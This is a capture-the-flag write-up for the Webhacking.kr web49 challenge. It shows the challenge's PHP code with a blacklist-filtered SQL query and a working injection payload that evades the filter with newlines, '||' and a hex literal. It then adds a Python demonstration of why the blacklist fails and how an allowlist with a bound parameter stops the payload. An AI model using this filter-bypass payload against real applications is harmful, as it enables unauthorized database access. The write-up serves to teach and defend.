Webhacking.kr - web49

web49

<?php
  if($_GET['lv']){
    $db = dbconnect();
    if(preg_match("/select|or|and|\(|\)|limit|,|\/|order|cash| |\t|\'|\"/i",$_GET['lv'])) exit("no hack");
    $result = mysqli_fetch_array(mysqli_query($db,"select id from chall49 where lv={$_GET['lv']}"));
    echo $result[0] ;
    if($result[0]=="admin") solve(49);
  }
?>

Solution

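Bypass the space filter with %0a, bypass or with ||, and bypass ' with a hex value (0x616425 is the hex encoding of ad%), so that the request is equivalent to ?lv=6 or id like 'ad%'.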
?lv=6||id%0alike%0a0x616425
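
Why the filter fails and what replaces it, as an added example that is not part of the original post: the challenge's blacklist is reproduced in Python (not the challenge's PHP), next to a digits-only allowlist and a bound parameter. The in-memory sqlite3 table stands in for the MySQL table, and its rows and the function names are constructed for illustration.

```python
import re
import sqlite3
from urllib.parse import unquote

# The challenge's blacklist, copied from the PHP source on this page.
BLACKLIST = re.compile(r"select|or|and|\(|\)|limit|,|\/|order|cash| |\t|\'|\"", re.I)


def blacklist_allows(lv: str) -> bool:
    """Mirror of the PHP check: True when the value is NOT rejected."""
    return BLACKLIST.search(lv) is None


def allowlist_allows(lv: str) -> bool:
    """Hardened check: lv must be 1-9 ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", lv) is not None


def make_db() -> sqlite3.Connection:
    # Constructed sample rows standing in for chall49 (an assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE chall49 (id TEXT, lv INTEGER)")
    db.executemany("INSERT INTO chall49 VALUES (?, ?)",
                   [("guest", 1), ("admin", 2)])
    return db


def lookup(db: sqlite3.Connection, lv: str):
    """Validate first, then bind lv as a parameter instead of interpolating it."""
    if not allowlist_allows(lv):
        return None
    row = db.execute("SELECT id FROM chall49 WHERE lv = ?", (int(lv),)).fetchone()
    return row[0] if row else None


# The request value from the write-up, URL-decoded as the server would see it.
PAYLOAD = unquote("6||id%0alike%0a0x616425")

if __name__ == "__main__":
    db = make_db()
    print("blacklist lets payload through:", blacklist_allows(PAYLOAD))
    print("allowlist lets payload through:", allowlist_allows(PAYLOAD))
    print("hardened lookup with payload:  ", lookup(db, PAYLOAD))
    print("hardened lookup with lv=1:     ", lookup(db, "1"))
```

The blacklist enumerates tokens, so any equivalent spelling it did not list (a newline for a space, || for or, a hex literal for a quoted string) passes; the allowlist and the bound parameter do not depend on guessing those spellings.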
This post is licensed under CC BY 4.0 by the author.